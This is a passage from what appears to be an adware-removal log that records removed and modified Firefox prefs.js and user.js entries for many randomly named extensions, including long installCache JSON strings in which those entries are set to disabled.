\Profiles\\\\o3rq6e92.default\\\\extensions\\\\oyyikq@ouoeld.edu\",\"mtime\":1367710019840},\"pdjx@iauy.net\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\pdjx@iauy.net\",\"mtime\":1367710019878},\"pjzb@oiyo.co.uk\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\pjzb@oiyo.co.uk\",\"mtime\":1367710019912},\"qmb7wl@sdmwieh.com\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\qmb7wl@sdmwieh.com\",\"mtime\":1367710019941},\"u6rdxqq@oawewjhi.com\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\u6rdxqq@oawewjhi.com\",\"mtime\":1367710019977}}}]");

---- Lines beee8skl@tksdduisq.co.uk removed from user.js ----

---- Lines pjzb@oiyo.co.uk removed from prefs.js ----

---- Lines pjzb@oiyo.co.uk modified from prefs.js ----

user_pref("extensions.installCache", "[{\"name\":\"winreg-app-global\",\"addons\":{\"smartwebprinting@hp.com\":{\"descriptor\":\"C:\\\\Program Files (x86)\\\\HP\\\\Digital Imaging\\\\Smart Web Printing\\\\MozillaAddOn3\",\"mtime\":1352924793926},\"wrc@avast.com\":{\"descriptor\":\"C:\\\\Program Files\\\\AVAST Software\\\\Avast\\\\WebRep\\\\FF\",\"mtime\":1363722322307}}},{\"name\":\"app-global\",\"addons\":{\"{972ce4c6-7e08-4474-a285-3208198ce6fd}\":{\"descriptor\":\"C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\extensions\\\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\",\"mtime\":1366386998658}}},{\"name\":\"winreg-app-user\",\"addons\":{\"smartwebprinting@hp.com\":{\"descriptor\":\"C:\\\\Program Files (x86)\\\\HP\\\\Digital Imaging\\\\Smart Web Printing\\\\MozillaAddOn3\",\"mtime\":1352924793926}}},{\"name\":\"app-profile\",\"addons\":{\"5uayyeeii@jrzxta.org\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\5uayyeeii@jrzxta.org\",\"mtime\":1367710019604},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019648},\"cjcdqvyuyu@odwkhl.net\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\cjcdqvyuyu@odwkhl.net\",\"mtime\":1367710019688},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019721},\"kg08cch@iofqz.edu\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\kg08cch@iofqz.edu\",\"mtime\":1367710019761},\"leethax@leethax.net\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\leethax@leethax.net.xpi\",\"mtime\":1365192788087},\"nfbednr@uuyy-.org\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\nfbednr@uuyy-.org\",\"mtime\":1367710019803},\"oyyikq@ouoeld.edu\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\oyyikq@ouoeld.edu\",\"mtime\":1367710019840},\"pdjx@iauy.net\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\pdjx@iauy.net\",\"mtime\":1367710019878},\"pjzb@oiyo.co.uk\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\pjzb@oiyo.co.uk\",\"mtime\":1367710019912},\"qmb7wl@sdmwieh.com\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\qmb7wl@sdmwieh.com\",\"mtime\":1367710019941},\"u6rdxqq@oawewjhi.com\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\u6rdxqq@oawewjhi.com\",\"mtime\":1367710019977}}}]");

---- Lines pjzb@oiyo.co.uk removed from user.js ----

---- Lines oyyikq@ouoeld.edu removed from prefs.js ----

---- Lines oyyikq@ouoeld.edu modified from prefs.js ----

user_pref("extensions.installCache", "[{\"name\":\"winreg-app-global\",\"addons\":{\"smartwebprinting@hp.com\":{\"descriptor\":\"C:\\\\Program Files (x86)\\\\HP\\\\Digital Imaging\\\\Smart Web Printing\\\\MozillaAddOn3\",\"mtime\":1352924793926},\"wrc@avast.com\":{\"descriptor\":\"C:\\\\Program Files\\\\AVAST Software\\\\Avast\\\\WebRep\\\\FF\",\"mtime\":1363722322307}}},{\"name\":\"app-global\",\"addons\":{\"{972ce4c6-7e08-4474-a285-3208198ce6fd}\":{\"descriptor\":\"C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\extensions\\\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\",\"mtime\":1366386998658}}},{\"name\":\"winreg-app-user\",\"addons\":{\"smartwebprinting@hp.com\":{\"descriptor\":\"C:\\\\Program Files (x86)\\\\HP\\\\Digital Imaging\\\\Smart Web Printing\\\\MozillaAddOn3\",\"mtime\":1352924793926}}},{\"name\":\"app-profile\",\"addons\":{\"5uayyeeii@jrzxta.org\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\5uayyeeii@jrzxta.org\",\"mtime\":1367710019604},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019648},\"cjcdqvyuyu@odwkhl.net\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\cjcdqvyuyu@odwkhl.net\",\"mtime\":1367710019688},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019721},\"kg08cch@iofqz.edu\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\kg08cch@iofqz.edu\",\"mtime\":1367710019761},\"leethax@leethax.net\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\leethax@leethax.net.xpi\",\"mtime\":1365192788087},\"nfbednr@uuyy-.org\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\nfbednr@uuyy-.org\",\"mtime\":1367710019803},\"oyyikq@ouoeld.edu\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\oyyikq@ouoeld.edu\",\"mtime\":1367710019840},\"pdjx@iauy.net\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\pdjx@iauy.net\",\"mtime\":1367710019878},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019912},\"qmb7wl@sdmwieh.com\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\qmb7wl@sdmwieh.com\",\"mtime\":1367710019941},\"u6rdxqq@oawewjhi.com\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\u6rdxqq@oawewjhi.com\",\"mtime\":1367710019977}}}]");

---- Lines oyyikq@ouoeld.edu removed from user.js ----

---- Lines u6rdxqq@oawewjhi.com removed from prefs.js ----

---- Lines u6rdxqq@oawewjhi.com modified from prefs.js ----

user_pref("extensions.installCache", "[{\"name\":\"winreg-app-global\",\"addons\":{\"smartwebprinting@hp.com\":{\"descriptor\":\"C:\\\\Program Files (x86)\\\\HP\\\\Digital Imaging\\\\Smart Web Printing\\\\MozillaAddOn3\",\"mtime\":1352924793926},\"wrc@avast.com\":{\"descriptor\":\"C:\\\\Program Files\\\\AVAST Software\\\\Avast\\\\WebRep\\\\FF\",\"mtime\":1363722322307}}},{\"name\":\"app-global\",\"addons\":{\"{972ce4c6-7e08-4474-a285-3208198ce6fd}\":{\"descriptor\":\"C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\extensions\\\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\",\"mtime\":1366386998658}}},{\"name\":\"winreg-app-user\",\"addons\":{\"smartwebprinting@hp.com\":{\"descriptor\":\"C:\\\\Program Files (x86)\\\\HP\\\\Digital Imaging\\\\Smart Web Printing\\\\MozillaAddOn3\",\"mtime\":1352924793926}}},{\"name\":\"app-profile\",\"addons\":{\"5uayyeeii@jrzxta.org\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\5uayyeeii@jrzxta.org\",\"mtime\":1367710019604},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019648},\"cjcdqvyuyu@odwkhl.net\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\cjcdqvyuyu@odwkhl.net\",\"mtime\":1367710019688},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019721},\"kg08cch@iofqz.edu\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\kg08cch@iofqz.edu\",\"mtime\":1367710019761},\"leethax@leethax.net\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\leethax@leethax.net.xpi\",\"mtime\":1365192788087},\"nfbednr@uuyy-.org\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\nfbednr@uuyy-.org\",\"mtime\":1367710019803},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019840},\"pdjx@iauy.net\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\pdjx@iauy.net\",\"mtime\":1367710019878},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019912},\"qmb7wl@sdmwieh.com\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\qmb7wl@sdmwieh.com\",\"mtime\":1367710019941},\"u6rdxqq@oawewjhi.com\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\u6rdxqq@oawewjhi.com\",\"mtime\":1367710019977}}}]");

---- Lines u6rdxqq@oawewjhi.com removed from user.js ----

---- Lines a-0ify@duayauakfin.net removed from prefs.js ----

---- Lines a-0ify@duayauakfin.net modified from prefs.js ----

---- Lines a-0ify@duayauakfin.net removed from user.js ----

---- Lines lsua3kd@n-euyuzb.org removed from prefs.js ----

---- Lines lsua3kd@n-euyuzb.org modified from prefs.js ----

---- Lines lsua3kd@n-euyuzb.org removed from user.js ----

---- Lines gvjoo@aaey-.net removed from prefs.js ----

---- Lines gvjoo@aaey-.net modified from prefs.js ----

---- Lines gvjoo@aaey-.net removed from user.js ----

---- Lines ulxgj9gd5@uiqhtcx.com removed from prefs.js ----

---- Lines ulxgj9gd5@uiqhtcx.com modified from prefs.js ----

---- Lines ulxgj9gd5@uiqhtcx.com removed from user.js ----

---- Lines qqbt_jw@oeiwr-.edu removed from prefs.js ----

---- Lines qqbt_jw@oeiwr-.edu modified from prefs.js ----

---- Lines qqbt_jw@oeiwr-.edu removed from user.js ----

---- Lines 1iwbgf@jmse.com removed from prefs.js ----

---- Lines 1iwbgf@jmse.com modified from prefs.js ----

---- Lines 1iwbgf@jmse.com removed from user.js ----

---- Lines qmb7wl@sdmwieh.com removed from prefs.js ----

---- Lines qmb7wl@sdmwieh.com modified from prefs.js ----

user_pref("extensions.installCache", "[{\"name\":\"winreg-app-global\",\"addons\":{\"smartwebprinting@hp.com\":{\"descriptor\":\"C:\\\\Program Files (x86)\\\\HP\\\\Digital Imaging\\\\Smart Web Printing\\\\MozillaAddOn3\",\"mtime\":1352924793926},\"wrc@avast.com\":{\"descriptor\":\"C:\\\\Program Files\\\\AVAST Software\\\\Avast\\\\WebRep\\\\FF\",\"mtime\":1363722322307}}},{\"name\":\"app-global\",\"addons\":{\"{972ce4c6-7e08-4474-a285-3208198ce6fd}\":{\"descriptor\":\"C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\extensions\\\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\",\"mtime\":1366386998658}}},{\"name\":\"winreg-app-user\",\"addons\":{\"smartwebprinting@hp.com\":{\"descriptor\":\"C:\\\\Program Files (x86)\\\\HP\\\\Digital Imaging\\\\Smart Web Printing\\\\MozillaAddOn3\",\"mtime\":1352924793926}}},{\"name\":\"app-profile\",\"addons\":{\"5uayyeeii@jrzxta.org\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\5uayyeeii@jrzxta.org\",\"mtime\":1367710019604},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019648},\"cjcdqvyuyu@odwkhl.net\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\cjcdqvyuyu@odwkhl.net\",\"mtime\":1367710019688},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019721},\"kg08cch@iofqz.edu\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\kg08cch@iofqz.edu\",\"mtime\":1367710019761},\"leethax@leethax.net\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\leethax@leethax.net.xpi\",\"mtime\":1365192788087},\"nfbednr@uuyy-.org\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\nfbednr@uuyy-.org\",\"mtime\":1367710019803},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019840},\"pdjx@iauy.net\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\pdjx@iauy.net\",\"mtime\":1367710019878},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019912},\"qmb7wl@sdmwieh.com\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\qmb7wl@sdmwieh.com\",\"mtime\":1367710019941},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019977}}}]");

---- Lines qmb7wl@sdmwieh.com removed from user.js ----

---- Lines txj2_9uyea@opskjeay.com removed from prefs.js ----

---- Lines txj2_9uyea@opskjeay.com modified from prefs.js ----

---- Lines txj2_9uyea@opskjeay.com removed from user.js ----

---- Lines kg08cch@iofqz.edu removed from prefs.js ----

---- Lines kg08cch@iofqz.edu modified from prefs.js ----

user_pref("extensions.installCache", "[{\"name\":\"winreg-app-global\",\"addons\":{\"smartwebprinting@hp.com\":{\"descriptor\":\"C:\\\\Program Files (x86)\\\\HP\\\\Digital Imaging\\\\Smart Web Printing\\\\MozillaAddOn3\",\"mtime\":1352924793926},\"wrc@avast.com\":{\"descriptor\":\"C:\\\\Program Files\\\\AVAST Software\\\\Avast\\\\WebRep\\\\FF\",\"mtime\":1363722322307}}},{\"name\":\"app-global\",\"addons\":{\"{972ce4c6-7e08-4474-a285-3208198ce6fd}\":{\"descriptor\":\"C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\extensions\\\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\",\"mtime\":1366386998658}}},{\"name\":\"winreg-app-user\",\"addons\":{\"smartwebprinting@hp.com\":{\"descriptor\":\"C:\\\\Program Files (x86)\\\\HP\\\\Digital Imaging\\\\Smart Web Printing\\\\MozillaAddOn3\",\"mtime\":1352924793926}}},{\"name\":\"app-profile\",\"addons\":{\"5uayyeeii@jrzxta.org\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\5uayyeeii@jrzxta.org\",\"mtime\":1367710019604},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019648},\"cjcdqvyuyu@odwkhl.net\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\cjcdqvyuyu@odwkhl.net\",\"mtime\":1367710019688},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019721},\"kg08cch@iofqz.edu\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\kg08cch@iofqz.edu\",\"mtime\":1367710019761},\"leethax@leethax.net\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\leethax@leethax.net.xpi\",\"mtime\":1365192788087},\"nfbednr@uuyy-.org\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\nfbednr@uuyy-.org\",\"mtime\":1367710019803},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019840},\"pdjx@iauy.net\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\pdjx@iauy.net\",\"mtime\":1367710019878},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019912},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019941},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019977}}}]");

---- Lines kg08cch@iofqz.edu removed from user.js ----

---- Lines 5uayyeeii@jrzxta.org removed from prefs.js ----

---- Lines 5uayyeeii@jrzxta.org modified from prefs.js ----

user_pref("extensions.installCache", "[{\"name\":\"winreg-app-global\",\"addons\":{\"smartwebprinting@hp.com\":{\"descriptor\":\"C:\\\\Program Files (x86)\\\\HP\\\\Digital Imaging\\\\Smart Web Printing\\\\MozillaAddOn3\",\"mtime\":1352924793926},\"wrc@avast.com\":{\"descriptor\":\"C:\\\\Program Files\\\\AVAST Software\\\\Avast\\\\WebRep\\\\FF\",\"mtime\":1363722322307}}},{\"name\":\"app-global\",\"addons\":{\"{972ce4c6-7e08-4474-a285-3208198ce6fd}\":{\"descriptor\":\"C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\extensions\\\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\",\"mtime\":1366386998658}}},{\"name\":\"winreg-app-user\",\"addons\":{\"smartwebprinting@hp.com\":{\"descriptor\":\"C:\\\\Program Files (x86)\\\\HP\\\\Digital Imaging\\\\Smart Web Printing\\\\MozillaAddOn3\",\"mtime\":1352924793926}}},{\"name\":\"app-profile\",\"addons\":{\"5uayyeeii@jrzxta.org\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\5uayyeeii@jrzxta.org\",\"mtime\":1367710019604},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019648},\"cjcdqvyuyu@odwkhl.net\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\cjcdqvyuyu@odwkhl.net\",\"mtime\":1367710019688},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019721},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019761},\"leethax@leethax.net\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\leethax@leethax.net.xpi\",\"mtime\":1365192788087},\"nfbednr@uuyy-.org\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\nfbednr@uuyy-.org\",\"mtime\":1367710019803},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019840},\"pdjx@iauy.net\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\pdjx@iauy.net\",\"mtime\":1367710019878},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019912},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019941},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019977}}}]");

---- Lines 5uayyeeii@jrzxta.org removed from user.js ----

---- Lines pdjx@iauy.net removed from prefs.js ----

---- Lines pdjx@iauy.net modified from prefs.js ----

user_pref("extensions.installCache", "[{\"name\":\"winreg-app-global\",\"addons\":{\"smartwebprinting@hp.com\":{\"descriptor\":\"C:\\\\Program Files (x86)\\\\HP\\\\Digital Imaging\\\\Smart Web Printing\\\\MozillaAddOn3\",\"mtime\":1352924793926},\"wrc@avast.com\":{\"descriptor\":\"C:\\\\Program Files\\\\AVAST Software\\\\Avast\\\\WebRep\\\\FF\",\"mtime\":1363722322307}}},{\"name\":\"app-global\",\"addons\":{\"{972ce4c6-7e08-4474-a285-3208198ce6fd}\":{\"descriptor\":\"C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\extensions\\\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\",\"mtime\":1366386998658}}},{\"name\":\"winreg-app-user\",\"addons\":{\"smartwebprinting@hp.com\":{\"descriptor\":\"C:\\\\Program Files (x86)\\\\HP\\\\Digital Imaging\\\\Smart Web 